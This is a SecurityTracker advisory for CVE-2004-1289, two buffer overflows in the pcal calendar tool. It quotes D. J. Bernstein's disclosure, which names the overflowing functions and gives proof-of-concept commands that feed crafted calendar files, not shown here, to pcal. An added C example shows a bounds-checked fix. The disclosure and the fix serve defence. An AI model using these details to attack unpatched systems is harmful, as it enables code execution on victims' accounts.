SecurityTracker.com
Category:   Application (Calendar)  >   pcal
Vendors:   pcal.sourceforge.net
pcal Buffer Overflows Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1012592
SecurityTracker URL:  http://securitytracker.com/id/1012592
CVE Reference:   CVE-2004-1289
Updated:  Jan 6 2005
Original Entry Date:  Dec 16 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.7.1
Description:   Two vulnerabilities were reported in pcal. A remote user can cause arbitrary code to be executed by the target user.

D. J. Bernstein reported that a remote user can create a specially crafted calendar file that, when processed by the target user with pcal, will execute arbitrary code on the target user's system. The code will run with the privileges of the target user.

The buffer overflows reside in the getline() function in 'pcalutil.c' and the get_holiday() function in 'readfile.c'.

Danny Lungstrom is credited with discovering these flaws.

Impact:   A remote user can cause arbitrary code to be executed by the target user with the privileges of the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  pcal.sourceforge.net/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Jan 6 2005 (Debian Issues Fix) pcal Buffer Overflows Let Remote Users Execute Arbitrary Code
Debian has released a fix.



 Source Message Contents

Subject:  [remote] [control] pcal 4.7.1 getline overflows tmpbuf; get_holiday overflows tmp




Danny Lungstrom, a student in my Fall 2004 UNIX Security Holes course,
has discovered two remotely exploitable security holes in pcal. I'm
publishing this notice, but all the discovery credits should be assigned
to Lungstrom.

You are at risk if you receive a calendar file through email (or a web
page or any other source that could be controlled by an attacker) and
feed that file through pcal. Whoever provides the calendar file then has
complete control over your account: he can read and modify your files,
watch the programs you're running, etc.

The pcal documentation does not tell users to avoid taking input from
the network. In fact, one can easily find web pages that supply calendar
files for public use.

Proof of concept: On an x86 computer running FreeBSD 4.10, as root, type

   cd /usr/ports/print/pcal
   make install

to download and compile the pcal program, version 4.7.1 (current). Then,
as any user, save the file 71-1.cal attached to this message, and type

   pcal -f 71-1.cal > 71-1.ps

with the unauthorized result that a file named ``exploited'' is created
in the current directory. The file 71-2.cal has the same effect but uses
another buffer overflow. (I tested these with a 525-byte environment, as
reported by printenv | wc -c.)

Here are the bugs: In pcalutil.c, getline() copies any amount of data
into a fixed-length tmpbuf array. In readfile.c, get_holiday() uses an
unprotected strcpy() to copy data into a fixed-length tmp array.

---D. J. Bernstein, Associate Professor, Department of Mathematics,
Statistics, and Computer Science, University of Illinois at Chicago
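
The two fixes implied by the bug description above, as an added example that is not part of the original message and not pcal source: a line reader and a field copy that each enforce the destination size and reject over-long input. Function names, buffer sizes and the sample input are assumptions made for illustration.

```c
/* Added illustration, not pcal source: names and buffer sizes are assumed. */
#include <stdio.h>
#include <string.h>
#define LINE_CAP 64 /* assumed; stands in for a fixed-length line buffer */
#define NAME_CAP 16 /* assumed; stands in for a fixed-length field buffer */

/* Read one line. Returns 1 = ok, 0 = EOF, -1 = line exceeded cap-1 bytes.
 * An over-long line is drained, never stored, so the next call is in sync. */
int read_line_bounded(FILE *fp, char *buf, size_t cap)
{
    size_t n = 0;
    int c, too_long = 0;
    if (cap == 0) return -1;
    while ((c = getc(fp)) != EOF && c != '\n') {
        if (n + 1 < cap)
            buf[n++] = (char)c;   /* always leaves room for the terminator */
        else
            too_long = 1;         /* keep consuming, stop storing */
    }
    buf[n] = '\0';
    if (too_long) return -1;
    return (c == EOF && n == 0) ? 0 : 1;
}

/* Bounded replacement for strcpy(): 0 = copied, -1 = rejected (no write). */
int copy_bounded(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    if (len >= cap) return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Constructed input: a 19-byte line, a 200-byte line ("%0200d"), a 5-byte
 * line. Returns a bitmask of the line indexes that passed both checks. */
int demo(void)
{
    char line[LINE_CAP], name[NAME_CAP];
    int i, r, mask = 0;
    FILE *fp = tmpfile();
    if (!fp) return -1;
    fprintf(fp, "constructed holiday\n%0200d\nshort\n", 0);
    rewind(fp);
    for (i = 0; (r = read_line_bounded(fp, line, sizeof line)) != 0; i++)
        if (r == 1 && copy_bounded(name, sizeof name, line) == 0)
            mask |= 1 << i;       /* line i fit both buffers */
    fclose(fp);
    return mask;
}
int main(void) { printf("accepted mask: %d\n", demo()); return 0; }
```

Only the third constructed line is accepted: the first fits the line buffer but not the field buffer, and the second is rejected by the reader before any copy is attempted.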


 
 

